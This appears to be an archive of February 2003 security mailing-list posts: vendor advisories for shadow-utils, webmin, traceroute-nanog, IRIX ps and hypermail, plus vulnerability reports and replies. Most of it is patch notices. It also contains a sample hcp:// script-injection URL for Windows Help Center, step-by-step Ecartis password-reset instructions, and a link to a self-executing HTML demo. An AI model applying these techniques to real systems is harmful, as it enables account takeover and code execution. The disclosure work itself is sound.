MDKSA-2003:026 - Updated shadow-utils packages fix improper mailspool ownership
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: shadow-utils Advisory ID:MDKSA-2003:026 Date: February 26th, 2003 Affected versions: 8.1, 8.2, 9.0, Multi Network Firewall 8.2 Problem Description: The shadow-utils package contains the tool useradd, which is used to create or update new user information. When useradd creates an account, it would create it with improper permissions; instead of having it owned by the group mail, it would be owned by the user's primary group. If this is a shared group (ie. "users"), then all members of the shared group would be able to obtain access to the mail spools of other members of the same group. A patch to useradd has been applied to correct this problem. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1509 Updated Packages: Mandrake Linux 8.1: d93c4cb6a8a6335f36982242e655937c 8.1/RPMS/shadow-utils-2902-2.1mdk.i586.rpm 55585fdbad9b036c4d75d041ba49959f 8.1/SRPMS/shadow-utils-2902-2.1mdk.src.rpm Mandrake Linux 8.1/IA64: 68f2dcf5eabd26c28a280c1b6636d600 ia64/8.1/RPMS/shadow-utils-2902-2.1mdk.ia64.rpm 55585fdbad9b036c4d75d041ba49959f ia64/8.1/SRPMS/shadow-utils-2902-2.1mdk.src.rpm Mandrake Linux 8.2: 2efd1aecd7bc0bfab1a63fcbc771c807 8.2/RPMS/shadow-utils-2902-5.1mdk.i586.rpm 173215e735d47ac3e47de40f7db929ba 8.2/SRPMS/shadow-utils-2902-5.1mdk.src.rpm Mandrake Linux 8.2/PPC: 075fed13279baf3b2fbd6680da785a36 ppc/8.2/RPMS/shadow-utils-2902-5.1mdk.ppc.rpm 173215e735d47ac3e47de40f7db929ba ppc/8.2/SRPMS/shadow-utils-2902-5.1mdk.src.rpm Mandrake Linux 9.0: 4aec1f507ffde87dd10299f31cb20b84 9.0/RPMS/shadow-utils-2902-8.1mdk.i586.rpm ea8bb79641b11a029eb7c989f8606ec8 9.0/SRPMS/shadow-utils-2902-8.1mdk.src.rpm Multi Network Firewall 8.2: 2efd1aecd7bc0bfab1a63fcbc771c807 mnf8.2/RPMS/shadow-utils-2902-5.1mdk.i586.rpm 173215e735d47ac3e47de40f7db929ba mnf8.2/SRPMS/shadow-utils-2902-5.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from: http://www.mandrakesecure.net/en/ftp.php Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command: rpm --checksig All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from: https://www.mandrakesecure.net/RPM-GPG-KEYS Please be aware that sometimes it takes the mirrors a few hours to update. You can view other update advisories for Mandrake Linux at: http://www.mandrakesecure.net/en/advisories/ MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting: http://www.mandrakesecure.net/en/mlist.php If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team - -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.7 (GNU/Linux) mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg 2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD LLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu ZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t PohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy /NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA BgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP WdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w Pk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA BgUCPI+UAwAKCRDniYrg
Re: Secunia Research: Opera browser Cross Site Scripting
Hi! Am Wed, Feb 26, 2003 at 04:00:55PM +0100, Jakob Balle schrieb: > == > 2) Affected Software > > Following have been tested and found vulnerable: > Opera prior to 7.02 on Windows > [...] > > == > 5) Solution > > Vendor patch: > Windows: Update to latest version. Opera v7.02 is not vulnerable. > Linux: No update available. > [...] > > == > 6) Time Table > > 15/02/2003 - Vulnerability discovered > 16/02/2003 - Further research > 17/02/2003 - Vendor informed > 19/02/2003 - Vendor confirmed and fixed vulnerability > 26/02/2003 - Vendor released Opera v7.02 > 26/02/2003 - Public disclosure of vulnerability Please note, that the Opera "Bork Edition", released on 14-Feb-2003, calls itself on the "opera:about" page also "Opera 7.02" (build number is "2658 Bork Edition"), but _is_ vulnerable. (Not tested, but it has been released before the vulnerability was discovered... :-) Kind regards, Axel Beckert -- -- Axel Beckert ecos electronic communication services gmbh IT-Securitylösungen * dynamische Webapplikationen * Consulting Post: Tulpenstrasse 5 D-55276 Dienheim b. Mainz E-Mail: [EMAIL PROTECTED] Voice: +49 6133 939-220 WWW:http://www.ecos.de/ Fax: +49 6133 939-333 -- || | Visit us at CeBIT from 12. to 19. March 2003 | | Messe Hannover * Halle 17 * Stand F 36 | | http://www.cebit.de/ | || --
Re: Netscape 6/7 crashes by a simple stylesheet...
Yes, it had been known for a while. Searching for "style overflow scroll" in bugzilla brings up a list of bug reports. So, instead of posting to bugtraq you could have added a note to one of those bug reports. Then again, posting here might put some pressure on mozilla developers, who knows? > "jux" == jux <[EMAIL PROTECTED]> writes: jux> I've found out that some simple CSS-code can crash Netscape 6 jux> and 7. jux> This is a simple html-page containing this code: jux> jux> jux> jux> Was this already known?
MS-Windows ME IE/Outlook/HelpCenter critical vulnerability
--[ Summary ]--
>From the Microsoft Security Bulletin MS03-006:
" A security vulnerability is present in the Windows Me version of Help
and Support Center [...]. An attacker could exploit the vulnerability by
constructing a URL that, when clicked on by the user, would execute code
of the attacker's choice in the Local Computer security context. The URL
could be hosted on a web page, or sent directly to the user in email. "
This issue can also be triggered automatically in some cases, without the
need for the victim to click on a link. It leads to total remote compromise of
the victim's computer.
Microsoft rates this issue as "Critical".
--[ Affected Systems ]--
- Windows ME (any version)
- Windows XP without SP1
Not vulnerable :
- Windows XP with SP1
Status of Windows 2000 was not tested but is believed to be the same as
Windows XP.
--[ Details]--
When an URL beginning with hcp:// is opened in Internet Explorer or
Outlook, the Help Center is launched. The URL is supplied to this
application without any additional check. The Help center will handle
the URL by opening the specified HTML help page (which is on the local
computer). Arguments, like the help topic name, can be given in the URL
and will be handled by javascript codes in the HTML page.
What happens if the victim follows this kind of link ?
hcp://vulnerable_help_page.htm?topic=javascript:alert('Malicious
script here can read, delete and execute any file')
The malicious topic we supplied will be used internally by scripts on
the page, will be inserted into the page, etc. So, the malicious script
will finally be executed in the Local Computer zone.
Exploitation has been confirmed on Windows ME and Windows XP without
SP1. When the malicious URL is opened into IE or Outlook, the Help
Center fires and execute the script crafted into the URL. Privileged
scripts actions and ActiveX controls can be run without any warning.
That allows an attacker to take total control over the victim's
computer.
We believe the Microsoft Security Bulletin issued about this issue is a
bit misleading. The problem was flagged as an "unchecked buffer in the
hcp:// URL handler leading to a buffer overrun vulnerability". We asked
Microsoft if they fixed a different problem than the one we reported,
but they told us it was the same.
We see it as a cross-site scripting vulnerability allowing an attacker
to execute arbitrary scripts in the relaxed security context of the Help
Center. This is much easier to exploit than a classical buffer overrun.
An attacker does not need to craft assembler code into the URL to
exploit this bug, he only needs to know a bit about client side
scripting languages and work around a weird triple-URL-decoding.
--[ Disclosure Timeline ]--
- "Warning" from The Hackademy Audit team found this vulnerability at the
end of November, 2002.
- Microsoft was notified early December.
- Readers of "The Hackademy Journal" were warned early December of
critical security issues in Windows ME and KDE (www.kde.org)
- KDE fixed its vulnerabilities early January.
- Microsoft fixed the Windows ME issue at the end of February (26/02)
--[ Solution ]--
Apply the patch provided by Microsoft in Security Bulletin MS03-006 :
http://www.microsoft.com/technet/security/bulletin/MS03-006.asp
-- Fozzy
The Hackademy School, Journal & Audit - Paris
http://www.thehackademy.net
ISMAIL (All Versions) Remote Buffer Overrun
NGSSoftware Insight Security Research Advisory Name:ISMAIL v 1.25 & v 1.4.3 Remote Buffer Overrun Systems Affected: WinNT, Win2K, XP Severity: High Risk Category: Remote Buffer Overrun Vendor URL: http://instantservers.com/ismail.html Author: Mark Litchfield ([EMAIL PROTECTED]) Date: 27th February 2003 Advisory number: #NISR27022003 Vendor Description ** ISMail is a powerful yet easy to use mail server for Windows 95/98/ME/NT/2000 & XP. It supports complete email service for both home and office use, and runs on a dedicated or a shared machine Details *** There exists a buffer overrun vulnerability in the SMTP service offered by ISMAIL. By supplying long Domain name values in either the MAIL FROM: or RCPT TO: values, an attacker can overwrite the saved returned return address on the stack. As ISMAIL runs as a LOCALSYSTEM account, any arbitrary code executed on the server being passed by an attacker will run with system privileges. If no code is supplied, ISMAIL will simply crash leaving a file in the outgoing message folder which will immediately trigger the error once ISMail is restarted. Fix Information *** The vendor has fixed the problems using the following: ISMail 1.4.5 (and subsequent versions) accept domain names up to 255 characters in length. Domain names exceeding this length in the 'mail from' and 'rcpt to' commands will result in a response of: '501 Syntax error in parameters' Further, SMTP 'mail from' and 'rcpt to' command lines exceeding 1024 characters (including the CRLF) will result in a response of: '500 Line too long' The fix is available from http://instantservers.com/download/ism145.exe Despite this is a BETA release, if you are running ISMAIL version 1.4.3 or below, NGS recommend upgrading to the BETA version to protect yourself from possible attacks. I would like to add that the vendors of ISMAIL reproduced, fixed and made a patch available within 48 hours of notification A check for these issues has been added to Typhon II, of which more information is available from the NGSSoftware website, http://www.ngssoftware.com. Further Information *** For further information about the scope and effects of buffer overflows, please see http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf
[SECURITY] [DSA 254-1] New NANOG traceroute packages fix buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 254-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 27th, 2003 http://www.debian.org/security/faq - -- Package: traceroute-nanog Vulnerability : buffer overflow Problem-Type : local, remote Debian-specific: no CVE Id : CAN-2002-1051 CAN-2002-1364 CAN-2002-1386 CAN-2002-1387 BugTraq Id : 4956 6166 6274 6275 A vulnerability has been discovered in NANOG traceroute, an enhanced version of the Van Jacobson/BSD traceroute program. A buffer overflow occurs in the 'get_origin()' function. Due to insufficient bounds checking performed by the whois parser, it may be possible to corrupt memory on the system stack. This vulnerability can be exploited by a remote attacker to gain root privileges on a target host. Though, most probably not in Debian. The Common Vulnerabilities and Exposures (CVE) project additionally identified the following vulnerabilities which were already fixed in the Debian version in stable (woody) and oldstable (potato) and are mentioned here for completeness (and since other distributions had to release a separate advisory for them): * CAN-2002-1364 (BugTraq ID 6166) talks about a buffer overflow in the get_origin function which allows attackers to execute arbitrary code via long WHOIS responses. * CAN-2002-1051 (BugTraq ID 4956) talks about a format string vulnerability that allows local users to execute arbitrary code via the -T (terminator) command line argument. * CAN-2002-1386 talks about a buffer overflow that may allow local users to execute arbitrary code via a long hostname argument. * CAN-2002-1387 talks about the spray mode that may allow local users to overwrite arbitrary memory locations. Fortunately, the Debian package drops privileges quite early after startup, so those problems aer not likely to result in an exploit on a Debian machine. For the current stable distribution (woody) the above problem has been fixed in version 6.1.1-1.2. For the old stable distribution (potato) the above problem has been fixed in version 6.0-2.2. For the unstable distribution (sid) these problems have been fixed in version 6.3.0-1. We recommend that you upgrade your traceroute-nanog package. wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 2.2 alias potato - - Source archives: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2.dsc Size/MD5 checksum: 578 c0a65b3b527a4939ceb53195eb67078f http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2.diff.gz Size/MD5 checksum: 6651 74ae0eb419bd8bcbcf3f0f591b1015aa http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0.orig.tar.gz Size/MD5 checksum:27020 39246e5b1d44d6276489d4801c4a7bfb Alpha architecture: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2_alpha.deb Size/MD5 checksum:23168 67c44d189c1c2c8384e49fda6dc25df1 ARM architecture: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2_arm.deb Size/MD5 checksum:19872 4f9a429c9eb0623e02ebcf226dcfb20a Intel IA-32 architecture: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2_i386.deb Size/MD5 checksum:18588 78445b5c9cbef332d14f22e40dce094b Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2_m68k.deb Size/MD5 checksum:17742 a797b9831aee1f5bdca3fa879a39fc34 PowerPC architecture: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2_powerpc.deb Size/MD5 checksum:19550 66ccd20f5d062885425531ee141d0cf1 Sun Sparc architecture: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.0-2.2_sparc.deb Size/MD5 checksum:22154 623a8662411fd9a00fea53688237c60d Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/t/traceroute-nanog/traceroute-nanog_6.1.1-1.2.dsc Size/MD5 checksum: 589 d7eb4bd225e4f2fc16c021776da0c081 http://security.debian
Ecardis Password Reseting Vulnerability
Hi, I don't know if someone has discovered this before but Ecartis 1.0.0 (former listar) contains a vulnerability that enables an attacker to reset passwords of any user defined on the list server, including the list admins. After logging on as a non-priviledged user, Ecartis enables the user to change his/her password, but does not ask for the old one. The first time I have seen this, I thought that the software relies on the session cookie, but it seems this is not the case. The html page contains the username in the "hidden" fields. After saving the page on disk, then replacing all "hidden" fields with another username which is defined in the server, and reloading the page again we can try our chance to change the password. Just fill in the empty password fields with a password of your choice, and click "Change Password": there you are... You have just reset the victim's password. I have not tested this on different versions, but I guess it will work for all of them. I would appreciate any comments on the issue. Regards,
Re: Netscape 6/7 crashes by a simple stylesheet...
This looks like http://bugzilla.mozilla.org/show_bug.cgi?id=189118 Tested Jocke's page on Mozilla for MacOS X. Worked fine, no effect. The top command said Mozilla was using under 2% of my CPU. Jocke wrote: >> >> >> >> >> >> >> >> >> >> -- Francis Uy, Web Coordinator http://cty.jhu.edu/cde/ 410-516-0162
MDKSA-2003:025 - Updated webmin packages fix session ID spoofing vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: webmin Advisory ID:MDKSA-2003:025 Date: February 26th, 2003 Affected versions: 7.2, 8.0, 8.1, 8.2, 9.0, Single Network Firewall 7.2 Problem Description: A vulnerability was discovered in webmin by Cintia M. Imanishi, in the miniserv.pl program, which is the core server of webmin. This vulnerability allows an attacker to spoof a session ID by including special metacharacters in the BASE64 encoding string used during the authentication process. This could allow an attacker to gain full administrative access to webmin. MandrakeSoft encourages all users to upgrade immediately. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0101 http://marc.theaimsgroup.com/?l=webmin-announce&m=104587858408101&w=2 Updated Packages: Linux-Mandrake 7.2: 0ee3a9b29088dab06b211f8137ead0f4 7.2/RPMS/webmin-0.970-2.1mdk.noarch.rpm 70c12cf5f873867e48097867ba4d7511 7.2/SRPMS/webmin-0.970-2.1mdk.src.rpm Mandrake Linux 8.0: 1942eff82c6e3d6307f1ed3effcd8445 8.0/RPMS/webmin-0.970-2.2mdk.noarch.rpm fd6e16fb437508d292a08f1b8e3f4395 8.0/SRPMS/webmin-0.970-2.2mdk.src.rpm Mandrake Linux 8.0/PPC: ac36fd178467656f52737465aa7064c0 ppc/8.0/RPMS/webmin-0.970-2.2mdk.noarch.rpm fd6e16fb437508d292a08f1b8e3f4395 ppc/8.0/SRPMS/webmin-0.970-2.2mdk.src.rpm Mandrake Linux 8.1: c54d6a04c43babd622352dc154c11cf1 8.1/RPMS/webmin-0.970-2.3mdk.noarch.rpm bd072335c255b99babe2820da0f40895 8.1/SRPMS/webmin-0.970-2.3mdk.src.rpm Mandrake Linux 8.1/IA64: 85e21a0044eadb0c4fcc7154490904d2 ia64/8.1/RPMS/webmin-0.970-2.3mdk.noarch.rpm bd072335c255b99babe2820da0f40895 ia64/8.1/SRPMS/webmin-0.970-2.3mdk.src.rpm Mandrake Linux 8.2: f539ce86d0abc4dc722ef80d1f44b041 8.2/RPMS/webmin-0.970-2.3mdk.noarch.rpm bd072335c255b99babe2820da0f40895 8.2/SRPMS/webmin-0.970-2.3mdk.src.rpm Mandrake Linux 8.2/PPC: a37bc31328fa2a6cad1160db622b8006 ppc/8.2/RPMS/webmin-0.970-2.3mdk.noarch.rpm bd072335c255b99babe2820da0f40895 ppc/8.2/SRPMS/webmin-0.970-2.3mdk.src.rpm Mandrake Linux 9.0: 78ef5e7e090ed425adafb1bcd044a6d3 9.0/RPMS/webmin-0.990-6.1mdk.noarch.rpm 4c1ec7e6fbca1226856a325ec0d35de3 9.0/SRPMS/webmin-0.990-6.1mdk.src.rpm Single Network Firewall 7.2: 0ee3a9b29088dab06b211f8137ead0f4 snf7.2/RPMS/webmin-0.970-2.1mdk.noarch.rpm 70c12cf5f873867e48097867ba4d7511 snf7.2/SRPMS/webmin-0.970-2.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from: http://www.mandrakesecure.net/en/ftp.php Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command: rpm --checksig All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from: https://www.mandrakesecure.net/RPM-GPG-KEYS Please be aware that sometimes it takes the mirrors a few hours to update. You can view other update advisories for Mandrake Linux at: http://www.mandrakesecure.net/en/advisories/ MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting: http://www.mandrakesecure.net/en/mlist.php If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team - -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.7 (GNU/Linux) mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg 2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD LLFs7OuVfaydLQYp1iiN6D+LJ
Re: poc zlib sploit just for fun :)
In article <[EMAIL PROTECTED]> you wrote: > [...] > Attached below is a patch RK and I whipped up yesterday, after I > caught wind of this problem sometime in the afternoon. > [...] Thanks for your efforts. We've reviewed your patch for inclusion into our OpenPKG "zlib" package and discovered that your configure checks are not quite correct. For instance, you're incorrectly putting a va_list variable into a snprintf call in one check, etc. Additionally we've stripped down in size the patch to gzio.c (you re-formatted existing code, etc). See http://cvs.openpkg.org/openpkg-src/zlib/zlib.patch for our derived version of your patch in case you're interested. Ralf S. Engelschall [EMAIL PROTECTED] www.engelschall.com
Re: Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II
Confirm on 6.0.2800.1106 On my IE is present: SP1, q324929, q810847, q813951 D'Amato Luigi Admin www.securitywireless.info - Original Message - From: "Dike" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, February 25, 2003 1:50 PM Subject: RE: Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II > Confirmed on IE 5.0 too :( > > Sorry One Liner, > Dike > > > -Original Message- > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > > Sent: Wednesday, February 26, 2003 4:45 AM > > To: [EMAIL PROTECTED] > > Subject: Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II > > Tuesday, February 25, 2003 > > > > We are delighted to learn that the original self-executing html file, > > from June 1 2002 is now fixed with the most current of the many > > patches for the Internet Explorer series of browsers. See: > > > > http://online.securityfocus.com/archive/1/275126 > > > > Regrettably. > > > > The following file is an html file comprising both scripting and an > > executable [*.exe]. > > > > We inject scripting and an executable into the html file which is > > designed to point back to the executable in the html file and execute > > it. Provided the html file is an html file, Internet Explorer 5.5 and > > 6.0 will execute it. > > > > Because it is an html file proper, Internet Explorer opens it. The > > scripting inside is then parsed and fired. That scripting is pointing > > back to the same executable file with our original codebase object > > from the year 2000 and because it is a self-executing html file, it > > executes ! > > > > Tested IE5.5 and IE6. Fully self-contained harmless *.exe: > > > > http://www.malware.com/html.exe.zip > > > > Be aware of html files out there. > > > > Key Words: Trust it's Worthy so Think it's Tank silly obvious > > > > -- > > http://www.malware.com > > >
Re: [VSA0307] Battlefield 1942 remote DoS
> Overview > > > By sending a specially crafted packet to the bf1942-server > remote administration port, an attacker can cause the server > to crash. After getting some reports, it seems that only servers running on Windows XP are vulnerable. Can someone confirm this? greuff pgp0.pgp Description: signature
Buffer Overrun Vulnerability in /sbin/ps on IRIX
-BEGIN PGP SIGNED MESSAGE-
__
SGI Security Advisory
Title: Buffer Overrun Vulnerability in /sbin/ps
Number : 20030202-01-I
Date : February 26, 2003
Reference: CVE-1999-0301
Reference: SGI BUG 696723
Fixed in : IRIX 6.5.5 or later
__
- ---
- --- Issue Specifics ---
- ---
It has been reported that there was a potential buffer overrun vulnerability
in the /sbin/ps program. This could result in a user with a local account
gaining privileged access.
For more information, see:
ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2003-SCO.1.1/CSSA-2003-SCO.1.1.txt
and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0301
SGI has investigated the issue and recommends the following steps for
neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.
These issues have been corrected in IRIX 6.5.5 and later.
- --
- --- Impact ---
- --
The /sbin/ps binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.base.
To determine the version of IRIX you are running, execute the following
command:
# /bin/uname -R
That will return a result similar to the following:
# 6.5 6.5.16f
The first number ("6.5") is the release name, the second ("6.5.16f" in this
case) is the extended release name. The extended release name is the
"version" we refer to throughout this document.
-
- --- Temporary Workaround ---
-
There is no effective workaround available for this problem.
SGI recommends upgrading to IRIX 6.5.5 or later.
-
- --- Solution ---
-
SGI has not provided patches for this vulnerability. Our recommendation
is to upgrade to IRIX 6.5.5 or later.
OS Version Vulnerable? Patch # Other Actions
-- --- --- -
IRIX 3.xunknown Note 1
IRIX 4.xunknown Note 1
IRIX 5.xunknown Note 1
IRIX 6.0.x unknown Note 1
IRIX 6.1unknown Note 1
IRIX 6.2unknown Note 1
IRIX 6.3unknown Note 1
IRIX 6.4unknown Note 1
IRIX 6.5 yes Notes 2 & 3
IRIX 6.5.1yes Notes 2 & 3
IRIX 6.5.2yes Notes 2 & 3
IRIX 6.5.3yes Notes 2 & 3
IRIX 6.5.4yes Notes 2 & 3
IRIX 6.5.5 no
IRIX 6.5.6 no
IRIX 6.5.7 no
IRIX 6.5.8 no
IRIX 6.5.9 no
IRIX 6.5.10no
IRIX 6.5.11no
IRIX 6.5.12no
IRIX 6.5.13no
IRIX 6.5.14no
IRIX 6.5.15no
IRIX 6.5.16no
IRIX 6.5.17no
IRIX 6.5.18no
NOTES
1) This version of the IRIX operating has been retired. Upgrade to an
actively supported IRIX operating system.
See http://support.sgi.com/ for more information.
2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/
3) Upgrade to IRIX 6.5.5 or later
-
- --- Acknowledgments
-
SGI wishes to thank cve.mitre.org, Sun Microsystems, SCO, and the users of
the Internet Community at large for their assistance in this matter.
- -
- --- Links ---
- -
SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/
SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/
SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/
SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/
SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/
SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or
http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/
SGI patches for Windows NT or 2000 can be found at:
http://support.sgi.com/nt/
IRIX 5.2-6.4 Recommended/Required Patch Sets can be found at:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/support/patchset/
IRIX 6.5 Maintenance Release Streams can be found at:
http://support.sgi.com/colls/patches/tools/relstream/index.html
IRIX 6.5 Software Update CDs can be obtained from:
http://support.sgi.com/irix/swupdates/
The primary SGI anonym
SuSE Security Announcement: hypermail (SuSE-SA:2003:0012)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:hypermail Announcement-ID:SuSE-SA:2003:0012 Date: Thursday, Feb 27th 2003 18:30 MET Affected products: 7.1, 7.2, 7.3, 8.0, 8.1 Vulnerability Type: remote system compromise Severity (1-10):4 SuSE default package: no Cross References: CAN-2003-0025 Content of this advisory: 1) security vulnerability resolved: several bugs after source code review problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - vnc - w3m 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information Hypermail is a tool to convert a Unix mail-box file to a set of cross- referenced HTML documents. During an internal source code review done by Thomas Biege several bugs where found in hypermail and its tools. These bugs allow remote code execution, local tmp race conditions, denial-of-service conditions and read access to files belonging to the host hypermail is running on. Additionally the mail CGI program can be abused by spammers as email- relay and should thus be disabled. There is no temporary fix known other then disabling hypermail. Please download and install the new packages from our FTP servers. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/hypermail-2.1.4-58.i586.rpm a4b683703b65cb65d0d1b246c2bf652d patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/hypermail-2.1.4-58.i586.patch.rpm 9e087a97c250c8987dda03da43e0dd1e source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/hypermail-2.1.4-58.src.rpm 9d95d9872a3ed98a4dbff25e952335d7 SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap4/hypermail-2.1.3-234.i386.rpm 53bdfc3ca1ab0c504f460ac7a18ba42e source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/hypermail-2.1.3-234.src.rpm be0df42b666fc59e38babd671479d2f1 SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/ap2/hypermail-2.1.2-141.i386.rpm 81194dcbb3cf149f67eac9948dd79db9 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/hypermail-2.1.2-141.src.rpm 9a02ce79e81bab281c418070fa91dbde SuSE-7.2: ftp://ftp.suse.com/pub/suse/i386/update/7.2/ap2/hypermail-2.1.0-91.i386.rpm d61f52df6c995b65e16a4141b1b7efa1 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/hypermail-2.1.0-91.src.rpm 